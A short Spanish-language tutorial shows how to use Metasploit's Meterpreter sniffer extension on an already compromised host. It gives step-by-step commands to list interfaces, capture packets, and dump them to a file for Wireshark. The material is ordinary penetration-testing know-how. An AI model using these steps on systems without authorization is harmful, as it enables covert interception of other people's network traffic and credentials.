Metasploit y Meterpreter como sniffer

Metasploit y Meterpreter como Sniffer

Esta guía parte de que ya estas en el meterpreter y tienes ciertos conocimientos, puedes seguir esta guia [1].

Una vez llegado al punto y estar ubicados en el meterpreter, hacemos lo siguiente y cargamos la extensión de sniffer.
meterpreter > use sniffer

Podemos ver las opciones disponibles con "?". Tenemos que seleccionar nuestra interfaz para usar el sniffer, vemos cuales están disponibles.
meterpreter > sniffer_interfaces

Luego de ver la interfaz, la seleccionamos.
meterpreter > sniffer_interfaces 1

Ahora empezamos a capturar paquetes.
meterpreter > sniffer_start (vemos las opciones disponibles)
meterpreter > sniffer_start 1 200000

Tenemos que esperar un tiempo prudencial para capturar los paquetes, vemos cuanto tenemos capturados.
meterpreter > sniffer_stats 1

Si crees que tienes lo suficiente capturados, guardamos el archivo con el nombre que quieras.
meterpreter > sniffer_dump 1 /tmp/stats.cap

Detenemos el sniffer.
meterpreter > sniffer_stop 1

Ahora si queremos ver el archivo, solo tenemos que usar algún analizador de paquetes como "Wireshark".


Jhyx